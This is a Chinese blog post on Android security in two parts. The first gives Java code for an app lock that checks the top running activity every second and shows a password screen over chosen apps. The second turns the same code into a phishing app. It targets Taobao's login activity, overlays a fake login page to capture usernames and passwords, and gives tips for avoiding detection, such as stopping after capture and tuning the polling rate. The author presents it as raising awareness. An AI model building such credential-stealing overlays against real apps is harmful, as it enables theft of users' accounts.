android基础知识33：android安全问题（一）程序锁及钓鱼

最新推荐文章于 2024-07-05 20:30:29 发布

xianming01

最新推荐文章于 2024-07-05 20:30:29 发布

阅读量1.3k

点赞数

分类专栏： android android管家文章标签： android string timer class service 安全相关

android 同时被 2 个专栏收录

122 篇文章 0 订阅

订阅专栏

android管家

10 篇文章 0 订阅

订阅专栏

一、程序锁

导读：本文介绍如何实现对应用加锁的功能，无须root权限

某些人有时候会有这样一种需求，小A下载了个软件，只是软件中的美女过于诱惑与暴露，所以他不想让别人知道这是个什么软件，起码不想让别人打开浏览。而这款软件又没有锁，任何人都可以打开，肿么办呢？如果打开它的时候需要输入密码，那该多好阿！于是，程序锁这种应用就产生了

程序锁不是最近才有的，很久之前android就有这种apk了

这一期我们来苛刻如何实现程序加锁功能

首先，我们先明确一下我们要做的程序具有什么功能

1可以选择需要加锁的程序

2可以设置密码

3可以关闭程序锁

这里作为演示，我们就尽量简化代码

我们先说最关键的部分

最关键的地方在于：当用户打开一个应用的时候，怎么弹出密码页面？

这里没有什么太好的办法，需要扫描task中的topActivity

首先，我们先获得运行的task

mActivityManager = (ActivityManager) context.getSystemService("activity");
//mActivityManager.getRunningTasks(1);//List<RunningTaskInfo>

getRunningTasks方法返回一个List，我们来看看这个List是什么

getRunningTasks 写道

Return a list of the tasks that are currently running, with the most recent being first and older ones after in order.
……

返回的List是有序的，第一个是最近的，所以我们取出第一个即可，然后得到此task中的最上层的Activity

ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;

topActivity居然是ComponentName类型，下面的事情就好办了，获得包名和类名

ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
String packageName = topActivity.getPackageName();
String className = topActivity.getClassName();
Log.v(TAG, "packageName" + packageName);
Log.v(TAG, "className" + className);

if (testPackageName.equals(packageName)
		&& testClassName.equals(className)) {
	Intent intent = new Intent();
	intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");
	intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
	mContext.startActivity(intent);
}

由于我没有选择程序这一步，所以我就固定一个应用做测试，这里选择的是htc的note应用

String testPackageName = "com.htc.notes";
String testClassName = "com.htc.notes.collection.NotesGridViewActivity";

下面我们该想，这段代码何时执行了

打开一个应用程序，系统不会发送广播，我们无法直接监听，所以这里我们采取定时扫描的策略

这里只是一个简单的实现，之后我们再讨论优化

我们采取每秒中检查一次task的方式，这里使用Timer吧，用Handler也一样可以实现

private Timer mTimer;
private void startTimer() {
	if (mTimer == null) {
		mTimer = new Timer();
		LockTask lockTask = new LockTask(this);
		mTimer.schedule(lockTask, 0L, 1000L);
	}
}

到这里，其实我们的关键代码就已经完成了

下面贴出完整带代码，注意：我们只关注弹出锁界面这部分，其他部分自行实现（比如文章末尾提到的）

Task，负责检查task，并在适当的时候弹出密码页面

public class LockTask extends TimerTask {
	public static final String TAG = "LockTask";
	private Context mContext;
	String testPackageName = "com.htc.notes";
	String testClassName = "com.htc.notes.collection.NotesGridViewActivity";

	private ActivityManager mActivityManager;

	public LockTask(Context context) {
		mContext = context;
		mActivityManager = (ActivityManager) context.getSystemService("activity");
	}

	@Override
	public void run() {
		ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
		String packageName = topActivity.getPackageName();
		String className = topActivity.getClassName();
		Log.v(TAG, "packageName" + packageName);
		Log.v(TAG, "className" + className);

		if (testPackageName.equals(packageName)
				&& testClassName.equals(className)) {
			Intent intent = new Intent();
			intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");
			intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
			mContext.startActivity(intent);
		}
	}
}

LockService，负责执行定时任务，取消任务等

public class LockService extends Service {
	private Timer mTimer;
	public static final int FOREGROUND_ID = 0;

	private void startTimer() {
		if (mTimer == null) {
			mTimer = new Timer();
			LockTask lockTask = new LockTask(this);
			mTimer.schedule(lockTask, 0L, 1000L);
		}
	}

	public IBinder onBind(Intent intent) {
		return null;
	}

	public void onCreate() {
		super.onCreate();
		startForeground(FOREGROUND_ID, new Notification());
	}

	public int onStartCommand(Intent intent, int flags, int startId) {
		startTimer();
		return super.onStartCommand(intent, flags, startId);
	}

	public void onDestroy() {
		stopForeground(true);
		mTimer.cancel();
		mTimer.purge();
		mTimer = null;
		super.onDestroy();
	}
}

MainActivity，测试用，作为应用入口，启动service（产品中，我们可以在receiver中启动service）。

public class MainActivity extends Activity {

	public void onCreate(Bundle savedInstanceState){
		super.onCreate(savedInstanceState);
		startService(new Intent(this, LockService.class));
	}
}

PasswordActivity，密码页面，很粗糙，没有核对密码逻辑，自行实现

记得重写onBackPressed函数，不然按返回键的时候……你懂的

public class PasswordActivity extends Activity {

	private static final String TAG = "PasswordActivity";
	Button okButton;
	EditText passwordEditText;
	private boolean mFinish = false;
	
	@Override
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.password);
		passwordEditText = (EditText) findViewById(R.id.password);
		 okButton = (Button) findViewById(R.id.ok);
		 okButton.setOnClickListener(new View.OnClickListener() {
			public void onClick(View v) {
				String password = passwordEditText.getText().toString();
				Log.v(TAG, "password" + password);
				mFinish = true;
				finish();
			}
		});
	}

	public void onBackPressed(){}
	
	public void onPause(){
		super.onPause();
		if(!mFinish){
			finish();
		}
	}
}

xml这里就不贴了，记得添加权限

<uses-permission android:name="android.permission.GET_TASKS"/>

关于程序的其他部分，这里只做简要说明

选择应用对其进行加锁部分

1列出系统中所有程序（你也可以自由发挥，比如过滤掉原始应用）

2选择，然后存入数据库（当然，最好也有取消功能，记得从数据库中删除数据）

程序锁总开关

可以使用sharedPreference，设置一个boolean开关

现在，当我想要打开htc的note应用的时候，就会弹出密码页面当我解锁，按home会回到桌面，长按home，点击note，还是会弹出密码框

因为是每秒检查一次，所以可能会有一点点延迟，你可以设置为500毫秒，但是越频繁，占用资源就越多

上面的代码我取得topActivity后检查了其包名行和类名，所以只有当打开指定的页面的时候，才会弹出密码锁

比如我对Gallery应用加密了，但是用户正在编辑短信，这时候它想发彩信，于是他通过短信进入到了Gallery……

对于某些用户的某些需求来说，这是不能容忍的，这时，我们只需简单修改下判断逻辑即可：只检查包名，包名一致就弹出密码锁，这样就完美了

程序锁我就分析到这里

最后一句

当使用程序锁的时候，你长按home，发现程序锁也出现在“最近的任务”中，肿么办……给此activity设置android:excludeFromRecents="true"即可

二、钓鱼程序

导读：文本介绍一种钓鱼应用，讲述如何骗取用户的用户名和密码，无须root

这个话题是继续android安全问题（二）程序锁延伸的

之前我已经展示了如何制作程序锁。当打开指定应用的时候，弹出一个密码页面。

程序锁的话题虽然是和安全相关，但是这应该属于防范的范围，如果被人恶意利用，那么后果……

这期我来揭示一下一种钓鱼程序的原理，希望广大用户不要上当受骗，最主要的是：希望大家意识到安全问

之前我用定时扫描activity的方法来检查打开的页面是不是我们所需要的页面

ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;

如何用于钓鱼呢？比如我打开了淘宝，然后想登录，查看一下我淘宝，这时候会打开下面这个页面

从log中我们能得到其包和类的信息

log 写道

10-17 10:02:14.698: I/ActivityManager(246): Displayed com.taobao.taobao/com.taobao.tao.LoginActivity: +305ms

恩，这就好办了，下面我只需改三处，程序锁这个应用就会变成调用应用

第一个修改很简单，修改我们监听的包名和类名即可

String testPackageName = "com.taobao.taobao";
String testClassName = "com.taobao.tao.LoginActivity";

完整代码

public class LockTask extends TimerTask {
	public static final String TAG = "LockTask";
	private Context mContext;
	String testPackageName = "com.taobao.taobao";
	String testClassName = "com.taobao.tao.LoginActivity";

	private ActivityManager mActivityManager;

	public LockTask(Context context) {
		mContext = context;
		mActivityManager = (ActivityManager) context.getSystemService("activity");
	}

	@Override
	public void run() {
		ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
		String packageName = topActivity.getPackageName();
		String className = topActivity.getClassName();
		Log.v(TAG, "packageName" + packageName);
		Log.v(TAG, "className" + className);

		if (testPackageName.equals(packageName)
				&& testClassName.equals(className)) {
			Intent intent = new Intent();
			intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity");
			intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
			mContext.startActivity(intent);
		}
	}
}

第二个修改有些技术含量，可能会需要一个专业的美工，来仿造一个淘宝的登录页面，就如上图所示的那样

最后一个修改，当病毒获取了用户名和密码之后，就不要再继续监听了，不然次数多了肯定会被发现

为了尽量不让用户察觉，可以把频率调高一些，比如500ms检查一次，这样用户就很难察觉了

测试项目完整源码见这里，代码是以android4.0为基础写的（当然，我的钓鱼页面是简陋的，只是用于演示）

（由于csdn只允许传图片，还得劳烦大家去我iteye的blog下载。。。汗阿）

无论是程序锁还是钓鱼程序，他们可能都担心耗电问题，因为耗电过多也会引起用户的注意

我们可以降低检查频率（当然，钓鱼程序是不会这么干的）

我们可以监控屏幕状态，当屏幕关闭的时候，我们可以停止监听，这时候也没有必要监听，当点亮的时候我们再监听

如何监听屏幕状态？

<receiver android:name=".ScreenListenerReceiver">
    <intent-filter>    
        <action android:name="android.intent.action.SCREEN_OFF"/>
        <action android:name="android.intent.action.SCREEN_ON"/>
    </intent-filter>
</receiver>

其余的事情大家就自己实现吧

参考资料：
《 android安全问题（二）程序锁》

《android安全问题（三）钓鱼程序》